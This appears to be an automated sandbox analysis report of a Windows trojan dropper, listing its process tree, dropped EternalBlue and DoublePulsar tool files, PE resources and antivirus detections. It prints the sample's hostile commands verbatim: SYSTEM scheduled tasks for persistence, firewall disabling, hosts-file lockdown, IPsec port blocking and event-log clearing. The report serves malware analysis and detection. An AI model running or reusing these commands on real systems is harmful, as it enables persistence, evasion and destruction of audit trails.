Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | Sept. 2, 2024, 10:12 a.m. | Sept. 2, 2024, 10:40 a.m. |
-
-
sc.exe sc config lanmanserver start= DISABLED 2>nul
2656 -
-
net1.exe C:\Windows\system32\net1 stop lanmanserver /y
3032
-
-
sc.exe sc delete lanmanserver
2700 -
-
net1.exe C:\Windows\system32\net1 stop mssecsvc2.0
800
-
-
sc.exe sc delete mssecsvc2.0
2816 -
-
net1.exe C:\Windows\system32\net1 stop mssecsvc2.1
2216
-
-
sc.exe sc delete mssecsvc2.1
2936 -
-
net1.exe C:\Windows\system32\net1 stop COMSysCts
3016
-
-
sc.exe sc delete COMSysCts
812 -
-
net1.exe C:\Windows\system32\net1 stop WmiAppSrv
2248
-
-
sc.exe sc delete WmiAppSrv
2260 -
-
net1.exe C:\Windows\system32\net1 stop Bcdefg
2120
-
-
sc.exe sc delete Bcdefg
2592 -
-
net1.exe C:\Windows\system32\net1 stop WSSDPSRVS
2940
-
-
sc.exe sc delete SSDPSRVS
2932 -
-
-
net1.exe C:\Windows\system32\net1 user mm123$ /del
940
-
-
net1.exe net1 user mm123$ /del
2660 -
-
net1.exe C:\Windows\system32\net1 user mm123$ /del
2776
-
-
net1.exe net1 user mm123$ /del
6000 -
-
net1.exe C:\Windows\system32\net1 user mm123$ /del
6984
-
-
net1.exe net1 user mm123$ /del
7044 -
sc.exe sc config Schedule start= auto
7116 -
sc.exe sc start Schedule
7108 -
schtasks.exe schtasks /delete /tn AutoKMSK /f
4596 -
schtasks.exe schtasks /delete /tn "Adobe Flash Player Updaters" /f
6952 -
schtasks.exe schtasks.exe /create /TN "AutoKMSK" /RU SYSTEM /TR "C:\windows\Installer\Fileftps.exe" /SC ONSTART
6896 -
schtasks.exe schtasks /run /tn "AutoKMSK"
3736 -
schtasks.exe schtasks /create /sc minute /mo 15 /tn "AutoKMSKK" /tr "C:\windows\Installer\free.bat" /ru "system" /f
5496 -
takeown.exe takeown /f C:\Windows\system32\Drivers\etc\hosts /a
6688 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6736 -
cacls.exe cacls C:\Windows\system32\Drivers\etc\hosts /g users:f
6772 -
attrib.exe attrib -s -h -a -r C:\Windows\system32\Drivers\etc\hosts
6072 -
attrib.exe attrib +s +h +a +r C:\Windows\system32\Drivers\etc\hosts
4544 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6604 -
cacls.exe cacls C:\Windows\system32\Drivers\etc\hosts /d everyone
6568 -
ipconfig.exe ipconfig /flushdns
6768 -
sc.exe sc start PolicyAgent
3068 -
sc.exe sc config PolicyAgent start= AUTO
3116 -
netsh.exe netsh ipsec static del all
4580 -
netsh.exe netsh ipsec static add policy name=Aliyun
7376 -
netsh.exe netsh ipsec static add filterlist name=Allowlist
3552 -
netsh.exe netsh ipsec static add filterlist name=denylist
5628 -
netsh.exe netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135
6508 -
netsh.exe netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137
3648 -
netsh.exe netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138
5336 -
netsh.exe netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139
5840 -
netsh.exe netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445
5420 -
netsh.exe netsh ipsec static add filteraction name=Allow action=permit
5788 -
netsh.exe netsh ipsec static add filteraction name=deny action=block
6140 -
netsh.exe netsh ipsec static add rule name=deny1 policy=Aliyun filterlist=denylist filteraction=deny
5644 -
netsh.exe netsh ipsec static set policy name=Aliyun assign=y
6260 -
wevtutil.exe wevtutil cl "windows powershell"
6244 -
wevtutil.exe wevtutil cl "security"
5940 -
wevtutil.exe wevtutil cl "system"
6248
-
-
-
-
-
netsh.exe netsh firewall set opmode mode=disable
2212
-
-
-
-
wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\tem.vbs"
2576
-
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
No hosts contacted. |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
packer | Armadillo v1.71 |
resource name | TEXTINCLUDE |
name | TEXTINCLUDE | language | LANG_CHINESE | filetype | C source, ASCII text, with CRLF line terminators | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00494c50 | size | 0x00000151 | ||||||||||||||||||
name | TEXTINCLUDE | language | LANG_CHINESE | filetype | C source, ASCII text, with CRLF line terminators | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00494c50 | size | 0x00000151 | ||||||||||||||||||
name | TEXTINCLUDE | language | LANG_CHINESE | filetype | C source, ASCII text, with CRLF line terminators | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00494c50 | size | 0x00000151 | ||||||||||||||||||
name | RT_CURSOR | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00495140 | size | 0x000000b4 | ||||||||||||||||||
name | RT_CURSOR | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00495140 | size | 0x000000b4 | ||||||||||||||||||
name | RT_CURSOR | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00495140 | size | 0x000000b4 | ||||||||||||||||||
name | RT_CURSOR | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00495140 | size | 0x000000b4 | ||||||||||||||||||
name | RT_BITMAP | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00496848 | size | 0x00000144 | ||||||||||||||||||
name | RT_BITMAP | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00496848 | size | 0x00000144 | ||||||||||||||||||
name | RT_BITMAP | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00496848 | size | 0x00000144 | ||||||||||||||||||
name | RT_BITMAP | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00496848 | size | 0x00000144 | ||||||||||||||||||
name | RT_BITMAP | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00496848 | size | 0x00000144 | ||||||||||||||||||
name | RT_BITMAP | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00496848 | size | 0x00000144 | ||||||||||||||||||
name | RT_BITMAP | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00496848 | size | 0x00000144 | ||||||||||||||||||
name | RT_BITMAP | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00496848 | size | 0x00000144 | ||||||||||||||||||
name | RT_BITMAP | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00496848 | size | 0x00000144 | ||||||||||||||||||
name | RT_BITMAP | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00496848 | size | 0x00000144 | ||||||||||||||||||
name | RT_BITMAP | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00496848 | size | 0x00000144 | ||||||||||||||||||
name | RT_BITMAP | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00496848 | size | 0x00000144 | ||||||||||||||||||
name | RT_BITMAP | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00496848 | size | 0x00000144 | ||||||||||||||||||
name | RT_BITMAP | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00496848 | size | 0x00000144 | ||||||||||||||||||
name | RT_MENU | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0049b1e8 | size | 0x00000284 | ||||||||||||||||||
name | RT_MENU | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0049b1e8 | size | 0x00000284 | ||||||||||||||||||
name | RT_DIALOG | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0049c430 | size | 0x0000018c | ||||||||||||||||||
name | RT_DIALOG | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0049c430 | size | 0x0000018c | ||||||||||||||||||
name | RT_DIALOG | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0049c430 | size | 0x0000018c | ||||||||||||||||||
name | RT_DIALOG | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0049c430 | size | 0x0000018c | ||||||||||||||||||
name | RT_DIALOG | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0049c430 | size | 0x0000018c | ||||||||||||||||||
name | RT_DIALOG | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0049c430 | size | 0x0000018c | ||||||||||||||||||
name | RT_DIALOG | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0049c430 | size | 0x0000018c | ||||||||||||||||||
name | RT_DIALOG | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0049c430 | size | 0x0000018c | ||||||||||||||||||
name | RT_DIALOG | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0049c430 | size | 0x0000018c | ||||||||||||||||||
name | RT_DIALOG | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0049c430 | size | 0x0000018c | ||||||||||||||||||
name | RT_STRING | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0049ce78 | size | 0x00000024 | ||||||||||||||||||
name | RT_STRING | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0049ce78 | size | 0x00000024 | ||||||||||||||||||
name | RT_STRING | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0049ce78 | size | 0x00000024 | ||||||||||||||||||
name | RT_STRING | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0049ce78 | size | 0x00000024 | ||||||||||||||||||
name | RT_STRING | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0049ce78 | size | 0x00000024 | ||||||||||||||||||
name | RT_STRING | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0049ce78 | size | 0x00000024 | ||||||||||||||||||
name | RT_STRING | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0049ce78 | size | 0x00000024 | ||||||||||||||||||
name | RT_STRING | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0049ce78 | size | 0x00000024 | ||||||||||||||||||
name | RT_STRING | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0049ce78 | size | 0x00000024 | ||||||||||||||||||
name | RT_STRING | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0049ce78 | size | 0x00000024 | ||||||||||||||||||
name | RT_STRING | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0049ce78 | size | 0x00000024 | ||||||||||||||||||
name | RT_GROUP_CURSOR | language | LANG_CHINESE | filetype | Lotus unknown worksheet or configuration, revision 0x2 | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0049cec4 | size | 0x00000022 | ||||||||||||||||||
name | RT_GROUP_CURSOR | language | LANG_CHINESE | filetype | Lotus unknown worksheet or configuration, revision 0x2 | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0049cec4 | size | 0x00000022 | ||||||||||||||||||
name | RT_GROUP_CURSOR | language | LANG_CHINESE | filetype | Lotus unknown worksheet or configuration, revision 0x2 | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0049cec4 | size | 0x00000022 | ||||||||||||||||||
name | RT_GROUP_ICON | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0049cf3c | size | 0x00000014 | ||||||||||||||||||
name | RT_GROUP_ICON | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0049cf3c | size | 0x00000014 | ||||||||||||||||||
name | RT_GROUP_ICON | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0049cf3c | size | 0x00000014 |
file | C:\Program Files\Windowsd\Eternalblue-2.2.0.exe |
file | C:\Program Files\Windowsd\etebCore-2.x64.dll |
file | C:\Program Files\Windowsd\posh.dll |
file | C:\Users\test22\AppData\Local\Temp\tem.vbs |
file | C:\Program Files\Windowsd\tibe.dll |
file | C:\Program Files\Windowsd\pcla-0.dll |
file | C:\Program Files\Windowsd\tucl.dll |
file | C:\Program Files\Windowsd\libeay32.dll |
file | C:\Program Files\Windowsd\adfw.dll |
file | C:\Users\test22\AppData\Local\Temp\xsfxdel~.exe |
file | C:\Program Files\Windowsd\etchCore-1.x64.dll |
file | C:\Program Files\Windowsd\ucl.dll |
file | C:\Program Files\Windowsd\xdvl-0.dll |
file | C:\Program Files\Windowsd\trch.dll |
file | C:\Windows\Installer\Fileftps.exe |
file | C:\Windows\Installer\free.bat |
file | C:\Program Files\Windowsd\pcrecpp-0.dll |
file | C:\Program Files\Windowsd\etchCore-0.x86.dll |
file | C:\Program Files\Windowsd\exma.dll |
file | C:\Program Files\Windowsd\libiconv-2.dll |
file | C:\Program Files\Windowsd\Esteemaudittouch-2.1.0.exe |
file | C:\Program Files\Windowsd\coli-0.dll |
file | C:\Program Files\Windowsd\iconv.dll |
file | C:\Program Files\Windowsd\trfo.dll |
file | C:\Program Files\Windowsd\cnli-1.dll |
file | C:\Program Files\Windowsd\trch-0.dll |
file | C:\Program Files\Windowsd\Eternalchampion-2.0.0.exe |
file | C:\Program Files\Windowsd\Eternalromance-1.3.0.exe |
file | C:\Program Files\Windowsd\riar.dll |
file | C:\Program Files\Windowsd\adfw-2.dll |
file | C:\Program Files\Windowsd\dmgd-4.dll |
file | C:\Program Files\Windowsd\etebCore-2.x86.dll |
file | C:\Program Files\Windowsd\etch-0.dll |
file | C:\Program Files\Windowsd\trch-1.dll |
file | C:\Program Files\Windowsd\tibe-2.dll |
file | C:\Program Files\Windowsd\tucl-1.dll |
file | C:\Program Files\Windowsd\Doublepulsar-1.3.1.exe |
file | C:\Program Files\Windowsd\tibe-1.dll |
file | C:\Program Files\Windowsd\riar-2.dll |
file | C:\Program Files\Windowsd\crli-0.dll |
file | C:\Program Files\Windowsd\etchCore-1.x86.dll |
file | C:\Program Files\Windowsd\dmgd-1.dll |
file | C:\Program Files\Windowsd\exma-1.dll |
file | C:\Program Files\Windowsd\Pkill.dll |
file | C:\Program Files\Windowsd\etchCore-0.x64.dll |
file | C:\Program Files\Windowsd\Eternalromance-1.4.0.exe |
file | C:\Program Files\Windowsd\zlib1.dll |
file | C:\Program Files\Windowsd\ssleay32.dll |
file | C:\Program Files\Windowsd\cnli-0.dll |
file | C:\Program Files\Windowsd\trfo-0.dll |
cmdline | schtasks /delete /tn "Adobe Flash Player Updaters" /f |
cmdline | schtasks /delete /tn AutoKMSK /f |
cmdline | schtasks.exe /create /TN "AutoKMSK" /RU SYSTEM /TR "C:\windows\Installer\Fileftps.exe" /SC ONSTART |
cmdline | schtasks /run /tn "AutoKMSK" |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" echo y" |
cmdline | schtasks /create /sc minute /mo 15 /tn "AutoKMSKK" /tr "C:\windows\Installer\free.bat" /ru "system" /f |
cmdline | wevtutil cl "windows powershell" |
file | C:\Users\test22\AppData\Local\Temp\tem.vbs |
file | C:\Windows\Installer\Fileftps.exe |
file | C:\Program Files\Windowsd\Fileftp.exe |
file | C:\Users\test22\AppData\Local\Temp\xsfxdel~.exe |
file | C:\Users\test22\AppData\Local\Temp\SandboxieInstall.exe |
file | C:\Users\test22\AppData\Local\Temp\xsfxdel~.exe |
file | C:\Users\test22\AppData\Local\Temp\202005191702_6d173b9549ce4fe1e5ada5ab9ce0bfff5d9569f19e7fa916db5c8d4f0dace63b_setup_nwc275a_demo.exe |
file | C:\Users\test22\AppData\Local\Temp\c64.exe |
section | {u'size_of_data': u'0x003c5000', u'virtual_address': u'0x00094000', u'entropy': 7.96904589584701, u'name': u'.rdata', u'virtual_size': u'0x003c43c4'} | entropy | 7.96904589585 | description | A section with a high entropy has been found | |||||||||
entropy | 0.842059336824 | description | Overall entropy of this PE file is high |
cmdline | netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445 |
cmdline | net user mm123$ /del |
cmdline | sc config Schedule start= auto |
cmdline | attrib -s -h -a -r C:\Windows\system32\Drivers\etc\hosts |
cmdline | net stop lanmanserver /y |
cmdline | net stop mssecsvc2.0 |
cmdline | net stop mssecsvc2.1 |
cmdline | sc delete lanmanserver |
cmdline | sc delete mssecsvc2.1 |
cmdline | sc delete mssecsvc2.0 |
cmdline | schtasks /delete /tn "Adobe Flash Player Updaters" /f |
cmdline | sc delete SSDPSRVS |
cmdline | schtasks /delete /tn AutoKMSK /f |
cmdline | netsh ipsec static del all |
cmdline | schtasks.exe /create /TN "AutoKMSK" /RU SYSTEM /TR "C:\windows\Installer\Fileftps.exe" /SC ONSTART |
cmdline | ipconfig /flushdns |
cmdline | netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138 |
cmdline | net stop Bcdefg |
cmdline | netsh ipsec static add filteraction name=deny action=block |
cmdline | attrib +s +h +a +r C:\Windows\system32\Drivers\etc\hosts |
cmdline | schtasks /run /tn "AutoKMSK" |
cmdline | netsh firewall set opmode mode=disable |
cmdline | sc start Schedule |
cmdline | sc delete Bcdefg |
cmdline | net stop WSSDPSRVS |
cmdline | schtasks /create /sc minute /mo 15 /tn "AutoKMSKK" /tr "C:\windows\Installer\free.bat" /ru "system" /f |
cmdline | sc config PolicyAgent start= AUTO |
cmdline | sc delete COMSysCts |
cmdline | netsh ipsec static add filterlist name=Allowlist |
cmdline | net stop WmiAppSrv |
cmdline | netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137 |
cmdline | netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139 |
cmdline | sc delete WmiAppSrv |
cmdline | netsh ipsec static add filteraction name=Allow action=permit |
cmdline | sc start PolicyAgent |
cmdline | net stop COMSysCts |
cmdline | netsh ipsec static add rule name=deny1 policy=Aliyun filterlist=denylist filteraction=deny |
cmdline | netsh ipsec static add filterlist name=denylist |
cmdline | netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135 |
cmdline | netsh ipsec static set policy name=Aliyun assign=y |
cmdline | sc config lanmanserver start= DISABLED 2>nul |
cmdline | netsh ipsec static add policy name=Aliyun |
file | C:\Users\test22\AppData\Local\Temp\SandboxieInstall.exe |
cmdline | schtasks.exe /create /TN "AutoKMSK" /RU SYSTEM /TR "C:\windows\Installer\Fileftps.exe" /SC ONSTART |
cmdline | schtasks /create /sc minute /mo 15 /tn "AutoKMSKK" /tr "C:\windows\Installer\free.bat" /ru "system" /f |
file | C:\Users\test22\AppData\Local\Temp\c64.exe |
file | C:\Users\test22\AppData\Local\Temp\tem.vbs |
file | c:\Windows\inf\demo1.bat |
file | C:\Windows\System32\drivers\etc\hosts |
file | C:\Users\test22\AppData\Local\Temp\SetupExe(20200504224110B04).log |
file | C:\Users\test22\AppData\Local\Temp\java_install_reg.log |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\5BY0Y7HX\index-vfl0GyzuL[1].css |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\U06NAGU2\ajax-loading-small-vfl3Wt7C_[1].gif |
file | C:\Users\test22\AppData\Local\Temp\SetupExe(20200504233731A78).log |
file | C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000011.log |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1F4WQUHZ\dropbox_logo_text_2015-vfld7_dJ8[1].svg |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\favicon[3].png |
file | C:\Users\test22\AppData\Local\Temp\Microsoft .NET Framework 4.5 KOR Language Pack Setup_20200715_141443571.html |
file | C:\Users\test22\AppData\Local\Temp\dd_dotNetFx45LP_Full_x86_x64ko_decompression_log.txt |
file | C:\Users\test22\AppData\Local\Temp\dd_SetupUtility.txt |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\AdPostInjectAsync[1].nhn |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini |
file | C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000001.log |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\favicon[1].png |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\TopNav[1].js |
file | C:\Users\test22\AppData\Local\Temp\ASPNETSetup_00000.log |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\U06NAGU2\RxZJdnzeo3R5zSexge8UUfY6323mHUZFJMgTvxaG2iE[1].eot |
file | C:\Users\test22\AppData\Local\Temp\dd_vcredist_amd64_20180201144548_000_vcRuntimeMinimum_x64.log |
file | C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000016.log |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\keys_js5[2].htm |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\CURBIYE7\yahoo[1].png |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\desktop.ini |
file | C:\Users\test22\AppData\Local\Temp\tmpaddon-1 |
file | C:\Users\test22\AppData\Local\Temp\~DFB8537D6963ECB123.TMP |
file | C:\Users\test22\AppData\Local\Temp\MSIdfbe6.LOG |
file | C:\Users\test22\AppData\Local\Temp\FXSAPIDebugLogFile.txt |
file | C:\Users\test22\AppData\Local\Temp\{E7573238-1B24-467B-B5A4-0BE967E0BF64}.tmp |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\favicon[4].png |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\keys_js5[2].htm |
file | C:\Users\test22\AppData\Local\Temp\SandboxieInstall.exe |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\favicon[2].png |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\ipsec[1].htm |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1F4WQUHZ\gmail[1].jpg |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\U06NAGU2\mnrstrtr[1].js |
file | C:\Users\test22\AppData\Local\Temp\SetupExe(20180405152043A34).log |
file | C:\Users\test22\AppData\Local\Temp\dd_vcredist_amd64_20180201144548.log |
file | C:\Users\test22\AppData\Local\Temp\UserInfoSetup(2018040515215734C).log |
file | C:\Users\test22\AppData\Local\Temp\RGI1518.tmp-tmp |
file | C:\Users\test22\AppData\Local\Temp\DMI9EEF.tmp |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.dat |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\SOC-Facebook[1].png |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\f[2].txt |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\CURBIYE7\klldr[1].js |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\favicon[1].png |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Cookies\Low\index.dat |
cmdline | wevtutil cl "system" |
cmdline | wevtutil cl "security" |
cmdline | cacls C:\Windows\system32\Drivers\etc\hosts /g users:f |
cmdline | wevtutil cl "windows powershell" |
cmdline | cacls C:\Windows\system32\Drivers\etc\hosts /d everyone |
file | C:\Windows\SysWOW64\wscript.exe |
cmdline | schtasks.exe /create /TN "AutoKMSK" /RU SYSTEM /TR "C:\windows\Installer\Fileftps.exe" /SC ONSTART |
cmdline | schtasks /create /sc minute /mo 15 /tn "AutoKMSKK" /tr "C:\windows\Installer\free.bat" /ru "system" /f |
Bkav | W32.VrerTmpolT.Trojan |
Lionic | Trojan.Win32.Generic.lpDo |
Elastic | malicious (high confidence) |
Cynet | Malicious (score: 100) |
Skyhigh | BehavesLike.Win32.Generic.rc |
ALYac | Gen:Variant.Application.Graftor.485457 |
Cylance | Unsafe |
VIPRE | Gen:Variant.Application.Graftor.485457 |
Sangfor | Dropper.Win32.FlyStudio.Vovj |
K7AntiVirus | Trojan ( 005246d51 ) |
BitDefender | Gen:Variant.Application.Graftor.485457 |
K7GW | Trojan ( 005246d51 ) |
Cybereason | malicious.879361 |
Arcabit | Trojan.Application.Graftor.D76851 |
Symantec | ML.Attribute.HighConfidence |
tehtris | Generic.Malware |
ESET-NOD32 | a variant of Win32/TrojanDropper.FlyStudio.CO |
APEX | Malicious |
McAfee | Artemis!D94524A87936 |
Avast | Win32:Malware-gen |
ClamAV | Win.Malware.Temr-7070541-0 |
Kaspersky | Trojan.Win32.Eb.dlp |
Alibaba | TrojanDropper:Win64/Miancha.fd64af8c |
NANO-Antivirus | Trojan.Win32.Eb.jsmbnw |
MicroWorld-eScan | Gen:Variant.Application.Graftor.485457 |
Emsisoft | Gen:Variant.Application.Graftor.485457 (B) |
F-Secure | Trojan.TR/AD.EquationDrug.qhhxk |
Zillya | Dropper.FlyStudio.Win32.2 |
McAfeeD | Real Protect-LS!D94524A87936 |
Trapmine | malicious.moderate.ml.score |
FireEye | Generic.mg.d94524a8793610d5 |
Sophos | Mal/Generic-S |
SentinelOne | Static AI - Malicious PE |
Webroot | W32.Adware.Gen |
Detected | |
Avira | TR/AD.EquationDrug.qhhxk |
MAX | malware (ai score=71) |
Kingsoft | malware.kb.a.929 |
Xcitium | Worm.Win32.Dropper.RA@1qraug |
Microsoft | Trojan:Win32/DoublePulsar |
ViRobot | Trojan.Win.Z.Flystudio.4698112 |
ZoneAlarm | Trojan.Win32.Eb.dlp |
GData | Win32.Trojan.PSE.17CZDTL |
Varist | W32/S-480dd005!Eldorado |
AhnLab-V3 | Trojan/Win.Eqtonex.C5213267 |
BitDefenderTheta | Gen:NN.ZexaF.36812.@t0@aqMGwNcb |
DeepInstinct | MALICIOUS |
VBA32 | Trojan.Win64.Miner |
Malwarebytes | Generic.Trojan.Malicious.DDS |
Ikarus | Trojan.Win32.Agent |